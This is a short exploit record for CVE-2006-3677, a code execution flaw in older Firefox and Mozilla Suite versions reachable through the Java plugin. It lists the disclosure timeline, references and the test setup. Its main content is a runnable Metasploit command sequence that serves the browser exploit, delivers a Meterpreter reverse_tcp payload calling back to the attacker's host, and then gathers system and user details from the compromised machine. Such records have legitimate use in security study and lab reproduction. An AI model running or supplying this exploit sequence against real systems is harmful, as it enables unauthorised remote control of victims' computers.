CVE-2006-3677 : Mozilla Suite/Firefox Navigator Object Code Execution

Timeline :

Vulnerability reported to ZDI by Anonymous
Vulnerability reported to the vendor by ZDI the 2006-06-16
Coordinated vulnerability disclosure the 2006-07-26
PoC provided by hdm the 2006-07-27
Metasploit PoC provided the 2006-07-30

    PoC provided by :

hdm

    Reference(s) :

CVE-2006-3677
MFSA 2006-45
ZDI-06-025

    Affected version(s) :

Version previous Firefox 1.5.0.5

    Tested on Windows XP SP3 with :

    Firefox 1.5.0.4

    Description :

This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit requires the Java plugin to be installed.

    Commands :

use exploit/multi/browser/mozilla_navigatorj­ava
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig